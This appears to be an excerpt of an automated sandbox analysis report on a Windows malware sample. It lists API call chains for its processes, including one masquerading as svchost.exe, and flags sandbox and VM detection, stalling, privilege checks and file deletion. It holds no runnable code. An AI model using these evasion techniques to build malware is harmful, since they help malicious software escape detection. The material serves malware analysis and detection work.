    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: memset,GetModuleFileNameA,StrStrIA,6_2_02572B40
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,6_2_02572BB0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: memset,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,6_2_02551170
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,6_2_0255D970
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,6_2_02551660
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,6_2_02553610
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,6_2_0256CE10
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,6_2_02571690
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,6_2_02573F50
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,6_2_02565720
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,6_2_02557FD0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,6_2_02571460
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,6_2_02573CE0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,6_2_025725C0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: GetUserNameA,memset,StrStrIA,6_2_0256ADE0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,8_2_025D6CA0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: memset,GetModuleFileNameA,StrStrIA,8_2_025E2B40
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,8_2_025E2BB0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: memset,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,8_2_025C1170
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,8_2_025CD970
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,8_2_025C1660
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,8_2_025C3610
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,8_2_025DCE10
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,8_2_025E1690
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,8_2_025E3F50
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,8_2_025D5720
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,8_2_025C7FD0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,8_2_025E1460
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,8_2_025E3CE0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,8_2_025E25C0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: GetUserNameA,memset,StrStrIA,8_2_025DADE0
    Contains functionality to detect sandboxes (registry SystemBiosVersion/Date)
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: 0_2_00403A20 RegQueryValueEx -> SystemBiosVersion/Date0_2_00403A20
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_00403A20 RegQueryValueEx -> SystemBiosVersion/Date1_2_00403A20
    Found evasive API chain (may stop execution after checking volume information)
    Source: C:\Users\user\Desktop\5AFlyarMds.exeEvasive API call chain: GetVolumeInformation,DecisionNodes,ExitProcessgraph_0-21221
    Source: C:\Windows\apppatch\svchost.exeEvasive API call chain: GetVolumeInformation,DecisionNodes,ExitProcessgraph_1-65407
    Found evasive API chain checking for user administrative privileges
    Source: C:\Windows\apppatch\svchost.exeCheck user administrative privileges: IsUserAndAdmin, DecisionNodegraph_1-65439
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCheck user administrative privileges: IsUserAndAdmin, DecisionNodegraph_0-21253
    Found stalling execution ending in API Sleep call
    Source: C:\Windows\apppatch\svchost.exeStalling execution: Execution stalls by calling Sleepgraph_1-65458
    Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\SysWOW64\vmhgfs.DLLJump to behavior
    Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\vmhgfs.DLLJump to behavior
    Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Program Files (x86)\Windows Defender\vmhgfs.DLLJump to behavior
    Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\vmhgfs.DLLJump to behavior
    Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\SysWOW64\OpenSSH\vmhgfs.DLLJump to behavior
    Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\apppatch\vmhgfs.DLLJump to behavior
    Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Program Files (x86)\Common Files\Oracle\Java\javapath\vmhgfs.DLLJump to behavior
    Source: C:\Users\user\Desktop\5AFlyarMds.exeFile opened / queried: C:\Users\user\Desktop\vmhgfs.DLLJump to behavior
    Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\SysWOW64\Wbem\vmhgfs.DLLJump to behavior
    Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Windows\system\vmhgfs.DLLJump to behavior
    Source: C:\Windows\apppatch\svchost.exeFile opened / queried: C:\Users\user\AppData\Local\Microsoft\WindowsApps\vmhgfs.DLLJump to behavior
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: 0_2_00401B20 rdtsc 0_2_00401B20
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CA78A0 CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle,1_2_02CA78A0
    Source: C:\Windows\apppatch\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeWindow / User API: threadDelayed 1732Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeWindow / User API: threadDelayed 7548Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CA79D0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,VirtualQuery,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,1_2_02CA79D0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F779D0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,5_2_02F779D0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_025679D0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,6_2_025679D0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025D79D0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,8_2_025D79D0
    Source: C:\Windows\apppatch\svchost.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_1-65523
    Source: C:\Windows\apppatch\svchost.exeAPI coverage: 9.0 %
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeAPI coverage: 2.1 %
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeAPI coverage: 2.1 %
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeAPI coverage: 2.2 %
    Source: C:\Windows\apppatch\svchost.exe TID: 7568Thread sleep count: 1732 > 30Jump to behavior
    Source: C:\Windows\apppatch\svchost.exe TID: 7568Thread sleep time: -173200s >= -30000sJump to behavior
    Source: C:\Windows\apppatch\svchost.exe TID: 7568Thread sleep count: 7548 > 30Jump to behavior
    Source: C:\Windows\apppatch\svchost.exe TID: 7568Thread sleep time: -754800s >= -30000sJump to behavior
    Source: C:\Windows\apppatch\svchost.exe TID: 7528Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CBDAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,1_2_02CBDAE8
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CBDA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,1_2_02CBDA50
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CB9910 GetHandleInformation,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,1_2_02CB9910
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CAD120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,1_2_02CAD120
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02C97680 GetHandleInformation,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,1_2_02C97680
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CAE6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,1_2_02CAE6B0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F8DAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,5_2_02F8DAE8
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F8DA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,5_2_02F8DA50
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F7D120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,5_2_02F7D120
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F89910 Sleep,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,5_2_02F89910
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F7E6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,5_2_02F7E6B0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F67680 Sleep,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,5_2_02F67680
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_0257DA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,6_2_0257DA50
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_0257DAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,6_2_0257DAE8
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_02579910 GetHandleInformation,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,6_2_02579910
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_0256D120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,6_2_0256D120
